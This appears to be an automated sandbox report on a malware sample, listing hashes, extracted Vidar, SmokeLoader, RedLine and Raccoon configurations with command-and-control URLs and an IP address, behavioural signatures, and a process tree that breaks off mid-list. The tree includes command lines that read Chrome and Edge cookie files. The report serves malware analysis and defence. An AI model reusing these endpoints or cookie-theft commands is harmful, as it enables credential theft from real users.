Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    134s
  • max time network
    263s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    30-07-2021 01:19

General

  • Target

    8 (18).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

C2

109.234.34.165:22204

Extracted

Family

raccoon

Botnet

b2f4d9fe1388d8fb99e44879db3e1a785afcac9d

Attributes
  • url4cnc

    https://t.me/uidsoyaada

rc4.plain
rc4.plain

Extracted

Family

vidar

Version

39.8

Botnet

932

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    932

Extracted

Family

vidar

Version

39.8

Botnet

921

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    921

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 6 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 60 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 19 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 25 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1884
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2688
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2936
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2696
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2532
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2484
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1468
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1392
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1224
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1104
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:1028
                        • C:\Users\Admin\AppData\Roaming\ddwbgbt
                          C:\Users\Admin\AppData\Roaming\ddwbgbt
                          2⤵
                            PID:5108
                          • C:\Users\Admin\AppData\Roaming\juwbgbt
                            C:\Users\Admin\AppData\Roaming\juwbgbt
                            2⤵
                              PID:5296
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                            1⤵
                              PID:60
                            • C:\Users\Admin\AppData\Local\Temp\8 (18).exe
                              "C:\Users\Admin\AppData\Local\Temp\8 (18).exe"
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:776
                              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:1184
                                • C:\Users\Admin\AppData\Local\Temp\7zS0A4D4274\setup_install.exe
                                  "C:\Users\Admin\AppData\Local\Temp\7zS0A4D4274\setup_install.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of WriteProcessMemory
                                  PID:2316
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_1.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:512
                                    • C:\Users\Admin\AppData\Local\Temp\7zS0A4D4274\sonia_1.exe
                                      sonia_1.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:3544
                                      • C:\Users\Admin\AppData\Local\Temp\7zS0A4D4274\sonia_1.exe
                                        "C:\Users\Admin\AppData\Local\Temp\7zS0A4D4274\sonia_1.exe" -a
                                        6⤵
                                        • Executes dropped EXE
                                        PID:2216
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_2.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:8
                                    • C:\Users\Admin\AppData\Local\Temp\7zS0A4D4274\sonia_2.exe
                                      sonia_2.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Checks SCSI registry key(s)
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:3732
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_4.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3924
                                    • C:\Users\Admin\AppData\Local\Temp\7zS0A4D4274\sonia_4.exe
                                      sonia_4.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2848
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_3.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3984
                                    • C:\Users\Admin\AppData\Local\Temp\7zS0A4D4274\sonia_3.exe
                                      sonia_3.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Modifies system certificate store
                                      PID:4020
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 1560
                                        6⤵
                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                        • Program crash
                                        PID:508
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_5.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:1908
                                    • C:\Users\Admin\AppData\Local\Temp\7zS0A4D4274\sonia_5.exe
                                      sonia_5.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      PID:1372
                                      • C:\Users\Admin\Documents\J1HleAMhmNn3jRzSYFICV6BM.exe
                                        "C:\Users\Admin\Documents\J1HleAMhmNn3jRzSYFICV6BM.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4776
                                        • C:\Users\Admin\Documents\J1HleAMhmNn3jRzSYFICV6BM.exe
                                          C:\Users\Admin\Documents\J1HleAMhmNn3jRzSYFICV6BM.exe
                                          7⤵
                                          • Executes dropped EXE
                                          PID:212
                                        • C:\Users\Admin\Documents\J1HleAMhmNn3jRzSYFICV6BM.exe
                                          C:\Users\Admin\Documents\J1HleAMhmNn3jRzSYFICV6BM.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:4372
                                        • C:\Users\Admin\Documents\J1HleAMhmNn3jRzSYFICV6BM.exe
                                          C:\Users\Admin\Documents\J1HleAMhmNn3jRzSYFICV6BM.exe
                                          7⤵
                                          • Executes dropped EXE
                                          PID:3960
                                      • C:\Users\Admin\Documents\bver95N2avcKErXNcYfRZRz8.exe
                                        "C:\Users\Admin\Documents\bver95N2avcKErXNcYfRZRz8.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:4764
                                        • C:\Users\Admin\AppData\Roaming\5910080.exe
                                          "C:\Users\Admin\AppData\Roaming\5910080.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5212
                                          • C:\Windows\system32\WerFault.exe
                                            C:\Windows\system32\WerFault.exe -u -p 5212 -s 1892
                                            8⤵
                                            • Program crash
                                            PID:5092
                                        • C:\Users\Admin\AppData\Roaming\2760709.exe
                                          "C:\Users\Admin\AppData\Roaming\2760709.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          PID:5228
                                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                            8⤵
                                            • Executes dropped EXE
                                            PID:4644
                                        • C:\Users\Admin\AppData\Roaming\4461965.exe
                                          "C:\Users\Admin\AppData\Roaming\4461965.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5276
                                      • C:\Users\Admin\Documents\8kXFln6SdnDJ9gbwdfd5Mldd.exe
                                        "C:\Users\Admin\Documents\8kXFln6SdnDJ9gbwdfd5Mldd.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:4752
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          7⤵
                                            PID:4972
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 252
                                            7⤵
                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                            • Program crash
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4236
                                        • C:\Users\Admin\Documents\NqE7nTol3avc6iyIFwoaqgk3.exe
                                          "C:\Users\Admin\Documents\NqE7nTol3avc6iyIFwoaqgk3.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4832
                                          • C:\Users\Admin\Documents\NqE7nTol3avc6iyIFwoaqgk3.exe
                                            "C:\Users\Admin\Documents\NqE7nTol3avc6iyIFwoaqgk3.exe"
                                            7⤵
                                              PID:5192
                                          • C:\Users\Admin\Documents\Xt7_vUxKk0AkGkjHUtAOvRxh.exe
                                            "C:\Users\Admin\Documents\Xt7_vUxKk0AkGkjHUtAOvRxh.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            PID:4820
                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5288
                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                              7⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:4396
                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                              • Executes dropped EXE
                                              PID:4588
                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5960
                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                              • Executes dropped EXE
                                              PID:4316
                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:4580
                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                              • Executes dropped EXE
                                              PID:4712
                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:2324
                                          • C:\Users\Admin\Documents\57QftOb71OEkVWCqymmg0lab.exe
                                            "C:\Users\Admin\Documents\57QftOb71OEkVWCqymmg0lab.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:4912
                                            • C:\Users\Admin\Documents\57QftOb71OEkVWCqymmg0lab.exe
                                              C:\Users\Admin\Documents\57QftOb71OEkVWCqymmg0lab.exe
                                              7⤵
                                              • Executes dropped EXE
                                              PID:1692
                                          • C:\Users\Admin\Documents\ryAvYCsWwQ2rj9M8VHPCS7IW.exe
                                            "C:\Users\Admin\Documents\ryAvYCsWwQ2rj9M8VHPCS7IW.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4960
                                          • C:\Users\Admin\Documents\V85RbZNmXcsnAzI08m1_UwBY.exe
                                            "C:\Users\Admin\Documents\V85RbZNmXcsnAzI08m1_UwBY.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4988
                                            • C:\Users\Admin\Documents\V85RbZNmXcsnAzI08m1_UwBY.exe
                                              C:\Users\Admin\Documents\V85RbZNmXcsnAzI08m1_UwBY.exe
                                              7⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:4804
                                            • C:\Users\Admin\Documents\V85RbZNmXcsnAzI08m1_UwBY.exe
                                              C:\Users\Admin\Documents\V85RbZNmXcsnAzI08m1_UwBY.exe
                                              7⤵
                                              • Executes dropped EXE
                                              PID:2208
                                            • C:\Users\Admin\Documents\V85RbZNmXcsnAzI08m1_UwBY.exe
                                              C:\Users\Admin\Documents\V85RbZNmXcsnAzI08m1_UwBY.exe
                                              7⤵
                                              • Executes dropped EXE
                                              PID:2132
                                          • C:\Users\Admin\Documents\yNdK47EmhYvOCb2rEA_7pkSb.exe
                                            "C:\Users\Admin\Documents\yNdK47EmhYvOCb2rEA_7pkSb.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4160
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c taskkill /f /im chrome.exe
                                              7⤵
                                                PID:5984
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /f /im chrome.exe
                                                  8⤵
                                                  • Kills process with taskkill
                                                  PID:6128
                                            • C:\Users\Admin\Documents\4grjqtdP7ogqSBFJwMkpus9j.exe
                                              "C:\Users\Admin\Documents\4grjqtdP7ogqSBFJwMkpus9j.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:2268
                                              • C:\Users\Admin\Documents\4grjqtdP7ogqSBFJwMkpus9j.exe
                                                "C:\Users\Admin\Documents\4grjqtdP7ogqSBFJwMkpus9j.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                PID:6100
                                              • C:\Users\Admin\Documents\4grjqtdP7ogqSBFJwMkpus9j.exe
                                                "C:\Users\Admin\Documents\4grjqtdP7ogqSBFJwMkpus9j.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                PID:6068
                                            • C:\Users\Admin\Documents\vRBqrhGi6FdIypQNAhbGeKUq.exe
                                              "C:\Users\Admin\Documents\vRBqrhGi6FdIypQNAhbGeKUq.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:4480
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                7⤵
                                                  PID:4800
                                              • C:\Users\Admin\Documents\DSn0q8CezcMDk2fVnvb0fCp2.exe
                                                "C:\Users\Admin\Documents\DSn0q8CezcMDk2fVnvb0fCp2.exe"
                                                6⤵
                                                  PID:4396
                                                  • C:\Users\Admin\Documents\DSn0q8CezcMDk2fVnvb0fCp2.exe
                                                    C:\Users\Admin\Documents\DSn0q8CezcMDk2fVnvb0fCp2.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:5196
                                                • C:\Users\Admin\Documents\hNfT7UwOUWpOFT3cyS_NJPV5.exe
                                                  "C:\Users\Admin\Documents\hNfT7UwOUWpOFT3cyS_NJPV5.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:4504
                                                  • C:\Users\Admin\Documents\hNfT7UwOUWpOFT3cyS_NJPV5.exe
                                                    "C:\Users\Admin\Documents\hNfT7UwOUWpOFT3cyS_NJPV5.exe"
                                                    7⤵
                                                      PID:6076
                                                    • C:\Users\Admin\Documents\hNfT7UwOUWpOFT3cyS_NJPV5.exe
                                                      "C:\Users\Admin\Documents\hNfT7UwOUWpOFT3cyS_NJPV5.exe"
                                                      7⤵
                                                        PID:4700
                                                    • C:\Users\Admin\Documents\KwYZ4CKRUkrm24fHl3LR6MRe.exe
                                                      "C:\Users\Admin\Documents\KwYZ4CKRUkrm24fHl3LR6MRe.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:4660
                                                      • C:\Users\Admin\Documents\KwYZ4CKRUkrm24fHl3LR6MRe.exe
                                                        "C:\Users\Admin\Documents\KwYZ4CKRUkrm24fHl3LR6MRe.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Checks SCSI registry key(s)
                                                        • Suspicious behavior: MapViewOfSection
                                                        PID:1576
                                                    • C:\Users\Admin\Documents\hDjsyppxdImzQetiBWnOcEHI.exe
                                                      "C:\Users\Admin\Documents\hDjsyppxdImzQetiBWnOcEHI.exe"
                                                      6⤵
                                                        PID:4372
                                                        • C:\Users\Admin\Documents\hDjsyppxdImzQetiBWnOcEHI.exe
                                                          C:\Users\Admin\Documents\hDjsyppxdImzQetiBWnOcEHI.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:4888
                                                      • C:\Users\Admin\Documents\H2FPUwSf6aILHhe6H9UU2FRh.exe
                                                        "C:\Users\Admin\Documents\H2FPUwSf6aILHhe6H9UU2FRh.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:4144
                                                        • C:\Users\Admin\Documents\H2FPUwSf6aILHhe6H9UU2FRh.exe
                                                          "C:\Users\Admin\Documents\H2FPUwSf6aILHhe6H9UU2FRh.exe"
                                                          7⤵
                                                            PID:5000
                                                          • C:\Users\Admin\Documents\H2FPUwSf6aILHhe6H9UU2FRh.exe
                                                            "C:\Users\Admin\Documents\H2FPUwSf6aILHhe6H9UU2FRh.exe"
                                                            7⤵
                                                              PID:5380
                                                            • C:\Users\Admin\Documents\H2FPUwSf6aILHhe6H9UU2FRh.exe
                                                              "C:\Users\Admin\Documents\H2FPUwSf6aILHhe6H9UU2FRh.exe"
                                                              7⤵
                                                                PID:3308
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                  8⤵
                                                                    PID:920
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                      9⤵
                                                                        PID:5916
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                      8⤵
                                                                        PID:2204
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffdf69d4f50,0x7ffdf69d4f60,0x7ffdf69d4f70
                                                                          9⤵
                                                                            PID:6032
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1720,8254229296317467913,4793279901852841639,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1764 /prefetch:2
                                                                            9⤵
                                                                              PID:1692
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1720,8254229296317467913,4793279901852841639,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2000 /prefetch:8
                                                                              9⤵
                                                                                PID:204
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1720,8254229296317467913,4793279901852841639,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2612 /prefetch:1
                                                                                9⤵
                                                                                  PID:4208
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1720,8254229296317467913,4793279901852841639,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2632 /prefetch:1
                                                                                  9⤵
                                                                                    PID:5148
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1720,8254229296317467913,4793279901852841639,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1760 /prefetch:8
                                                                                    9⤵
                                                                                      PID:5952
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1720,8254229296317467913,4793279901852841639,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
                                                                                      9⤵
                                                                                        PID:4248
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1720,8254229296317467913,4793279901852841639,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
                                                                                        9⤵
                                                                                          PID:4304
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1720,8254229296317467913,4793279901852841639,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:1
                                                                                          9⤵
                                                                                            PID:5348
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1720,8254229296317467913,4793279901852841639,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:1
                                                                                            9⤵
                                                                                              PID:5064
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
